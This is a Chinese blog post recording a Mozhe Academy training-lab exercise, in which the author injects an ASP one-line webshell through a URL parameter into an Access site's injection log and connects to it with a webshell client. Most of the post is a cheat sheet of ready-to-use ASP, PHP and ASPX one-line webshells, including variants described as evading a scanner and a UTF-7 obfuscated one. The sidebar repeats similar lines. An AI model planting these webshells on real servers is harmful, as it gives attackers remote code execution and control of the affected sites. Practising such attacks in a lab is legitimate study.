SQL注入实战(防注入)-Access<墨者学院漏洞操作记录>

最新推荐文章于 2023-01-24 18:14:00 发布
最新推荐文章于 2023-01-24 18:14:00 发布
阅读量291 收藏
点赞数
分类专栏: 漏洞/靶场操作记录 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/118799362
版权

1、 打开靶场

拿御剑扫秒后台


 

百度得知所有记录会保存在sqlin.asp的目录

2、 插入一句话木马 <%eval request(“user”)%>

http://219.153.49.228:47828/news.asp?id=1%20

and%201=%3C%eval%20request(%22user%22)%%3E



3、 对木马进行URLencode

使用菜刀连接并找到key;

常用的一句话木马

常用一句话木马

asp一句话木马:
   <%execute(request("value"))%>
  php一句话木马:
   <?php @eval($_POST[value]);?>
  aspx一句话木马:
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"])%>

其他一句话木马:

<%eval request("value")%>
  <%execute request("value")%>
  <%execute(request("value"))%>
  <%If Request("value")<>"" Then Execute(Request("value"))%>
  <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
  <SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"],"unsafe");%>
  可以躲过雷客图的一句话木马:
  <%
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
  ms.Language="VBScript"
  ms.AddObject "Response", Response
  ms.AddObject "request", request
  ms.ExecuteStatement("ev"&"al(request(""value""))")
  %>
  不用'<,>'的asp一句话木马:
  <script language=VBScript runat=server>execute request("value")</script>
  不用双引号的一句话木马:
  <%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

chick&
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用权限管理等功能,能有效阻止火墙和杀毒软件尚未识别的安全危险,从源头上杜绝病毒的侵入,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全护。 * 在管理员用户下也可以轻松开启免疫隔离术 * 优化各项监控,保护更全面 * 增强 U 盘病毒免疫,彻底御 U 盘病毒 * 优化了与输入法的不兼容性问题 * 优化了与IE浏览器的不兼容性问题 * 软件界面全新优化,资源占用更低,产品更稳定 安装后可以免费安装趋势科技2008版,可以一年免费升级。 自己使用下来的感觉,墨者真的是一个看门的好东西,一切访问注册表,系统主要文件,往系统里面写东西都要通过墨者授权,可能稍微有些麻烦,但是给我们带来了安全,我是强烈推荐的。比360安全卫士更好,安全系数更高。
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1123
背景介绍 安全工程师&amp;quot;墨者&amp;quot;最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
SQL注入实战(注入)-Access
qq_36896220的博客
09-15 343
这道题目算是给了SQL注入另外的思路了。一般而言我们测试SQL注入会选择那些有直接显示的地方(比如id=1,name=xxx),但这会局限你的思维,所以一定要多多培养做题的思路才能应对各种情况。下面会给出不一样的思路: 1.这是墨者学院一道有waf的sql注入,有很多人遇到有waf的环境就感觉头大,确实绕waf很头疼,但waf也有强弱之分,我们要做的就是测试一下对方服务器的waf做了什么,...
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 289
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
墨者学院;sql手工注入access;在线靶场
xiaochenhang的博客
08-20 716
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
01-在线挑战详细攻略-《我很简单,请不要欺负我》 http://bbs.ichunqiu.com/thread-1783-1-1.html (出处: i春秋社区-分享你的技术,为安全加点温度)
wjy397的专栏
11-18 5937
系列文章: 02-在线挑战详细攻略-《网站综合渗透实验》 03-在线挑战详细攻略-《又见DZ,我能拿你怎么办》 04-在线挑战详细攻略-《2015中国网络安全大赛:Reinstall真题》 05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》 Setp 0 实验环境 操作机:Windows XP [172.16.11.2] 目标机:Wi
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1706
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
墨者学院-SQL手工注入专题
qq_44657899的博客
02-15 3706
这段时间联系一下SQL注入墨者SQL手工注入专题 三种数据库的注入详解 数据库:MySQL MySQL的很简单 1,查字段数 http://mozhe.cn/new_list.php?id=0 order by 5 时报错,说明字段有5个 2,查数据库 http://mozhe.cn/new_list.php?id=0 union select 1,SCHEMA_NAME,3,4 from i...
墨者学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 848
墨者学院–SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
墨者 - SQL注入实战(注入)-Access
吃肉唐僧的博客
07-11 1004
网上百度得知,access通用注入系统会把所有记录存到sqlin.asp中 根据题目提示一句话木马,那么这个题其实属于文件上传漏洞,不是SQL注入的范畴了 asp一句话木马 <%eval request("a")%> 直接上传,发现会被过滤掉 用url编码一下:1+and+%3c%25eval+request(%22a%22)%25%3e,成功绕过 直...
Web安全:一句话木马
cldimd的博客
09-11 4383
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括
一句话木马
weixin_30532837的博客
07-12 183
一句话木马 asp <%execute(request("kxc"))%> <%eval request ("pass")%> <%eval request(chr(35))%> <%executerequest("YouPass")%> <%eval(request(“1″)):response.end%> php...
其他常见的getshell方式
LJH1999ZN的博客
03-31 3607
ASP常用的一句话木马: <%eval request(“hack")%> <%execute request(“hack")%> <%execute(request(“hack"))%> <%ExecuteGlobal request(“hack")%> 一、修改配置文件getshell HadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装,每一步程序将会引用一些文件进行操作,但是由于inst
墨者学院sql注入 x-f
最新发布
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值